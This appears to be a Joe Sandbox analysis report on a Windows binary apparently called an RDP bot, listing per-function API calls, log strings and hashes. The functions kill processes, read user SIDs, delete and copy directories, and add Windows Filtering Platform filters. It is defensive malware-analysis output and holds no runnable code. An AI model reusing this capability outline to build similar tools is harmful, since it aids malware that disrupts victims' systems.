OpenProcess.KERNEL32 ref: 00007FF64B9324E2
TerminateProcess.KERNEL32 ref: 00007FF64B9324FC
GetLastError.KERNEL32 ref: 00007FF64B93250A
CloseHandle.KERNEL32 ref: 00007FF64B932895

Strings

[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FF64B932320
(name != NULL) || (pid != 0), xrefs: 00007FF64B9321C5
[I] (%s) -> Done(name=%s,pid=%lu), xrefs: 00007FF64B9328B5
process_kill, xrefs: 00007FF64B9321CC, 00007FF64B9321FE, 00007FF64B932232, 00007FF64B932319, 00007FF64B932515, 00007FF64B9325AE, 00007FF64B932719, 00007FF64B9328AE
~, xrefs: 00007FF64B93260B
[E] (%s) -> OpenProcess failed(gle=%lu), xrefs: 00007FF64B9325B5
P, xrefs: 00007FF64B932439
~, xrefs: 00007FF64B932430
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9321D3
~, xrefs: 00007FF64B93238C
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF64B932720
, xrefs: 00007FF64B932245
[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x), xrefs: 00007FF64B932205
P, xrefs: 00007FF64B932395
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF64B9321BE
, xrefs: 00007FF64B9325D5
~, xrefs: 00007FF64B9322AF
, xrefs: 00007FF64B93253C
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF64B93251C
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FF64B932239
P, xrefs: 00007FF64B932614
|, xrefs: 00007FF64B9321B6
NULL, xrefs: 00007FF64B932916, 00007FF64B932922
P, xrefs: 00007FF64B9322B8
, xrefs: 00007FF64B93232C

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
API String ID: 3326156344-4160762685
Opcode ID: ddae266145e06ba45a32dd147251454c87ade30978731ea112754126fa238577
Instruction ID: ff944f830d5ad6cfeff51aeb28ad1557ba5eb7c3d0debdc5eae6abd5c87d61eb
Opcode Fuzzy Hash: ddae266145e06ba45a32dd147251454c87ade30978731ea112754126fa238577
Instruction Fuzzy Hash: 67F1F711E1C60382FFACB755E8843793250AF1F755E206132CA1ECAAF3DE5EBD859242

Function 00007FF64B934D81 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF64B934DA6
RemoveDirectoryA.KERNEL32 ref: 00007FF64B934DBE
GetLastError.KERNEL32 ref: 00007FF64B934DC8

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

strcpy.MSVCRT ref: 00007FF64B934E92
strlen.MSVCRT ref: 00007FF64B934E9A
strlen.MSVCRT ref: 00007FF64B934EB6
strlen.MSVCRT ref: 00007FF64B934EC7
strcpy.MSVCRT ref: 00007FF64B934EE1
strlen.MSVCRT ref: 00007FF64B934EE9
strlen.MSVCRT ref: 00007FF64B934F0B
strlen.MSVCRT ref: 00007FF64B934F1F
strcmp.MSVCRT ref: 00007FF64B934F61
strcmp.MSVCRT ref: 00007FF64B934F74
RemoveDirectoryA.KERNEL32 ref: 00007FF64B93501D
GetLastError.KERNEL32 ref: 00007FF64B93502B

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B934E11
*, xrefs: 00007FF64B934ECC
[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FF64B934F94
NULL, xrefs: 00007FF64B935165
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF64B934DE6, 00007FF64B935049
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B934DFC
fs_dir_delete, xrefs: 00007FF64B934DDF, 00007FF64B934E0A, 00007FF64B934F8D, 00007FF64B935042, 00007FF64B935111, 00007FF64B935174
(path != NULL), xrefs: 00007FF64B934E03
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF64B935118
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF64B93517B

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 2460052984-4087913290
Opcode ID: f49021cfd17e5645a415218e2337d23fcbe7ef664cc3b0d8083bd933364814f5
Instruction ID: dd83f5e299f43626d8e426802168505261bfbd4dd9e01ea9f7992c1bd7375c55
Opcode Fuzzy Hash: f49021cfd17e5645a415218e2337d23fcbe7ef664cc3b0d8083bd933364814f5
Instruction Fuzzy Hash: 20A1AE22A0C68295FB70BB59E4143BA6391EF8F345FA46032D94DC6AB7EE3DE4458701

Function 00007FF64B9353BF Relevance: 42.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00007FF64B93541A
strlen.MSVCRT ref: 00007FF64B935422
strlen.MSVCRT ref: 00007FF64B935443
strlen.MSVCRT ref: 00007FF64B935455
strcmp.MSVCRT ref: 00007FF64B9354FD
strcmp.MSVCRT ref: 00007FF64B935515
strcat.MSVCRT ref: 00007FF64B935575
strlen.MSVCRT ref: 00007FF64B93557D
strcpy.MSVCRT ref: 00007FF64B935663
strlen.MSVCRT ref: 00007FF64B93566B
strlen.MSVCRT ref: 00007FF64B93568D
strcat.MSVCRT ref: 00007FF64B9356A6
strcpy.MSVCRT ref: 00007FF64B9356B9
strlen.MSVCRT ref: 00007FF64B9356C1
strlen.MSVCRT ref: 00007FF64B9356E3
strcat.MSVCRT ref: 00007FF64B9356FF

Strings

(dst != NULL), xrefs: 00007FF64B9355F8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9355DB, 00007FF64B935606
[I] (%s) -> Filtered(f_src=%s,flt=%s), xrefs: 00007FF64B9355AD
(src != NULL), xrefs: 00007FF64B9355CD
NULL, xrefs: 00007FF64B9358CD, 00007FF64B9358D6
|, xrefs: 00007FF64B935582
*, xrefs: 00007FF64B93545A
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B9355C6, 00007FF64B9355F1
[I] (%s) -> Done(src=%s,dst=%s), xrefs: 00007FF64B9358EC
[D] (%s) -> Copy(f_src=%s,f_dst=%s), xrefs: 00007FF64B935719
fs_dir_copy, xrefs: 00007FF64B9355A6, 00007FF64B9355D4, 00007FF64B9355FF, 00007FF64B935712, 00007FF64B935869, 00007FF64B9358E5
[E] (%s) -> Failed(src=%s,dst=%s,err=%08x), xrefs: 00007FF64B935870

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strlen$strcatstrcpy$strcmp
String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
API String ID: 2140730755-3699962909
Opcode ID: 53b4bd48d3555066442ddf4302ded71f9d2e6007b6eed7bc00e144543ebe8498
Instruction ID: 2774a0f1b021e1589372ad748b0b7590e1f575f319b9f20c44fbc5dc3922a1c4
Opcode Fuzzy Hash: 53b4bd48d3555066442ddf4302ded71f9d2e6007b6eed7bc00e144543ebe8498
Instruction Fuzzy Hash: 9AC1A061A0C68291FAA0BB15E5443FA6351EF4E788F846032DA5DC7AABDF7CE505CB01

Function 00007FF64B931D60 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 207memoryCOMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32 ref: 00007FF64B931D8A
GetTokenInformation.ADVAPI32 ref: 00007FF64B931DC0
GetLastError.KERNEL32 ref: 00007FF64B931DCE
LocalFree.KERNEL32 ref: 00007FF64B931E08
CloseHandle.KERNEL32 ref: 00007FF64B931E13
GetLastError.KERNEL32 ref: 00007FF64B931EB8
LocalAlloc.KERNEL32 ref: 00007FF64B931F70
GetTokenInformation.ADVAPI32 ref: 00007FF64B931F9E
GetLastError.KERNEL32 ref: 00007FF64B931FAC

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

LocalAlloc.KERNEL32 ref: 00007FF64B93209A
GetLengthSid.ADVAPI32 ref: 00007FF64B9320AC
memcpy.MSVCRT ref: 00007FF64B9320BC

Strings

[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF64B931EA1
(hnd != NULL), xrefs: 00007FF64B931E32
(sid != NULL), xrefs: 00007FF64B931E62
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B931E40, 00007FF64B931E70
process_get_user_sid, xrefs: 00007FF64B931DE3, 00007FF64B931E39, 00007FF64B931E69, 00007FF64B931E9A, 00007FF64B931EC6, 00007FF64B931FBA
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF64B931E2B, 00007FF64B931E5B
[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu), xrefs: 00007FF64B931DEA, 00007FF64B931FC1
[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu), xrefs: 00007FF64B931ECD

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
API String ID: 3826151639-1775164968
Opcode ID: a6c61a1b07e674b01c5ec014d58fb88dea4969261ebe8cbd2533bfbf6d8bc1e9
Instruction ID: d2bc21bd824a139ac0e3106b356712f1b70e60d0c3ad340245c09231b63df914
Opcode Fuzzy Hash: a6c61a1b07e674b01c5ec014d58fb88dea4969261ebe8cbd2533bfbf6d8bc1e9
Instruction Fuzzy Hash: F7915B22E0C51281FB74BB14E8507B92652AF8F795F692032D91EC7AB3DE3DEC958341

Function 00007FF64B93795A Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF64B93797E
HeapAlloc.KERNEL32 ref: 00007FF64B93798F
GetProcessHeap.KERNEL32 ref: 00007FF64B937C24
HeapFree.KERNEL32 ref: 00007FF64B937C35
FwpmFilterAdd0.FWPUCLNT ref: 00007FF64B937BEA

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF64B937C74
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF64B937CAF
FwpmFilterAdd0.FWPUCLNT ref: 00007FF64B937D44

Strings

mem_alloc, xrefs: 00007FF64B937C52
[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF64B937C94
TL, xrefs: 00007FF64B9379C0
TL, xrefs: 00007FF64B937A0C
setup_svc_filt, xrefs: 00007FF64B937C07, 00007FF64B937C8D, 00007FF64B937CD2, 00007FF64B937D67
;9rJ, xrefs: 00007FF64B937CEF
3L, xrefs: 00007FF64B937B7F
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx), xrefs: 00007FF64B937C0E
[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx), xrefs: 00007FF64B937CD9
[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx), xrefs: 00007FF64B937D6E
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF64B937C59

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
API String ID: 3629392964-1470975255
Opcode ID: 97da833c0286c23491248727b5f9ff6699206188f68b1a177a93830b109ce109
Instruction ID: 3ac005ecd54b2e34db4059c14e0f7945269b6a8d63bd33b5c278887d2071b1a1
Opcode Fuzzy Hash: 97da833c0286c23491248727b5f9ff6699206188f68b1a177a93830b109ce109
Instruction Fuzzy Hash: 19A1A42260D7C285E761AB15F8407AE77A1FB9A794F045134EACC87BAADF3DC484CB40

Function 00007FF64B938153 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64B938008: GetFileAttributesW.KERNEL32 ref: 00007FF64B938019

wcslen.MSVCRT ref: 00007FF64B938195
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF64B938241
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF64B93827F
FwpmFilterAdd0.FWPUCLNT ref: 00007FF64B938448
GetProcessHeap.KERNEL32 ref: 00007FF64B93848A
HeapFree.KERNEL32 ref: 00007FF64B93849B
GetProcessHeap.KERNEL32 ref: 00007FF64B9384B2
HeapFree.KERNEL32 ref: 00007FF64B9384C3
FwpmFilterAdd0.FWPUCLNT ref: 00007FF64B938523

Strings

3L, xrefs: 00007FF64B9383DD
[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF64B938261
TL, xrefs: 00007FF64B938205
TL, xrefs: 00007FF64B9381B9
;9rJ, xrefs: 00007FF64B9384CE
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx), xrefs: 00007FF64B938468
[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx), xrefs: 00007FF64B9382A3
[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx), xrefs: 00007FF64B938547
setup_app_filt, xrefs: 00007FF64B93825A, 00007FF64B93829C, 00007FF64B938461, 00007FF64B938540

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
API String ID: 2990311666-1793103013
Opcode ID: 2c997fc73ab919394416098a8c18d9cb1dd8f1079b30a699f2a821e8dd8f435d
Instruction ID: 57c8fe7d64c5828dad63684e9e2b4bfeebcfd3f2bc1d6b228dc5dc41a9b5e1cb
Opcode Fuzzy Hash: 2c997fc73ab919394416098a8c18d9cb1dd8f1079b30a699f2a821e8dd8f435d
Instruction Fuzzy Hash: BA91852160D7C295E761EB25E48039EB7A1EB9A750F145134EACC87FAAEF3DC545CB00

Function 00007FF64B93405E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF64B93407D
CreateDirectoryA.KERNEL32 ref: 00007FF64B93409F
GetLastError.KERNEL32 ref: 00007FF64B9340F0
strcpy.MSVCRT ref: 00007FF64B934141
strlen.MSVCRT ref: 00007FF64B934149
strlen.MSVCRT ref: 00007FF64B934165
strlen.MSVCRT ref: 00007FF64B934176
CreateDirectoryA.KERNEL32 ref: 00007FF64B9341E7
GetLastError.KERNEL32 ref: 00007FF64B9341F1

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9340D5
NULL, xrefs: 00007FF64B934317
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B9340C0
(path != NULL), xrefs: 00007FF64B9340C7
fs_dir_create, xrefs: 00007FF64B9340CE, 00007FF64B934102, 00007FF64B934199, 00007FF64B9342BF, 00007FF64B934326
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FF64B9341A0
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF64B9342C6
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF64B93432D
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF64B934109

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: 8777b3765a0b61160c2dd5586f2618d65661b4ac38adbf88f21a5bf13e2edb7f
Instruction ID: 4bac61698f9f3b653443db5345e808f8ecaa126bebb7d96d2030a2ecd4d2c5cc
Opcode Fuzzy Hash: 8777b3765a0b61160c2dd5586f2618d65661b4ac38adbf88f21a5bf13e2edb7f
Instruction Fuzzy Hash: A2718A21B0C64392FB607BA9E8847B91391AF5E748F162132D95ED7BB7DE2CE845C301

Function 00007FF64B93341C Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 187synchronizationCOMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32 ref: 00007FF64B933436
WaitForSingleObject.KERNEL32 ref: 00007FF64B93345A
GetExitCodeProcess.KERNEL32 ref: 00007FF64B933468
GetLastError.KERNEL32 ref: 00007FF64B93350F
TerminateProcess.KERNEL32 ref: 00007FF64B9335FC
GetLastError.KERNEL32 ref: 00007FF64B93360A
GetLastError.KERNEL32 ref: 00007FF64B9336F1

Part of subcall function 00007FF64B9333C0: CloseHandle.KERNEL32 ref: 00007FF64B9333D8
Part of subcall function 00007FF64B9333C0: CloseHandle.KERNEL32 ref: 00007FF64B9333DE

Strings

[E] (%s) -> Failed(pid=%lu,err=%08x), xrefs: 00007FF64B9334F9
(pi != NULL), xrefs: 00007FF64B9334BC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9334CA
[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FF64B933705
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF64B9334B5
[I] (%s) -> Done(pid=%lu,exit_code=%08lx), xrefs: 00007FF64B93349F
[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FF64B933525
[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu), xrefs: 00007FF64B933620
process_close, xrefs: 00007FF64B933498, 00007FF64B9334C3, 00007FF64B9334F2, 00007FF64B93351E, 00007FF64B933619, 00007FF64B9336FE

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
API String ID: 1879646588-710610406
Opcode ID: 1ab2c9bf8f2caa541bedd61938cb30dfc0d099194f247efb2808cbd3032f71e4
Instruction ID: 474bbf4bf8b346c0c43eb6538972fe8f174545b16db790e8578cf70062169cfa
Opcode Fuzzy Hash: 1ab2c9bf8f2caa541bedd61938cb30dfc0d099194f247efb2808cbd3032f71e4
Instruction Fuzzy Hash: 39813E62E4C52782FBA1BB15E4443786360AF0E754F156172CC6FD7AB7DE2CAC858382

Function 00007FF64B933909 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF64B93392A
GetLastError.KERNEL32 ref: 00007FF64B933A0A

Strings

fs_attr_get, xrefs: 00007FF64B933977, 00007FF64B9339AE, 00007FF64B9339E7, 00007FF64B933A18, 00007FF64B933B4C
c, xrefs: 00007FF64B9339D1
NULL, xrefs: 00007FF64B933B3A
, xrefs: 00007FF64B933A2B
(path != NULL), xrefs: 00007FF64B9339A7
P, xrefs: 00007FF64B933A93
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B93397E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9339B5, 00007FF64B9339EE
~, xrefs: 00007FF64B933A8E
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B9339A0, 00007FF64B9339D9
[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF64B933A1F
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF64B933B53
